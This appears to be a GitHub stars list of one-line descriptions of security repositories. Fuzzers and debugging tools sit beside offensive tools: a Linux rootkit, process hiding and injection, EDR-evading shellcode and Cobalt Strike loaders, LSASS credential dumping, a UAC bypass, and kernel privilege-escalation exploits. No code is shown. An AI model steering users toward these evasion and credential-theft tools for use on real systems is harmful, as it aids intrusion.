Stars
Capturing SSL/TLS plaintext without a CA certificate using eBPF. Supported on Linux/Android kernels for amd64/arm64.
The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
Terminal based "The Matrix" like implementation
🌴Linux、macOS、Windows Kernel privilege escalation vulnerability collection, with compilation environment, demo GIF map, vulnerability details, executable file (提权漏洞合集)
Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).
ret-sync is a set of plugins that helps to synchronize a debugging session (WinDbg/GDB/LLDB/OllyDbg2/x64dbg) with IDA/Ghidra/Binary Ninja disassemblers.
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)
Tool for injecting a shared object into a Linux process
Hide a process under Linux using the ld preloader (https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/)
A protective and Low Level Shellcode Loader that defeats modern EDR systems.
This Repository aims at giving a basic idea about Kernel Exploitation.
MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly.
Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind
mboehme / aflfast
Forked from mirrorer/aflAFLFast (extends AFL with Power Schedules)
A variant of Gargoyle for x64 to hide memory artifacts using ROP only and PIC
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities
A Visual Studio template used to create Cobalt Strike BOFs
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.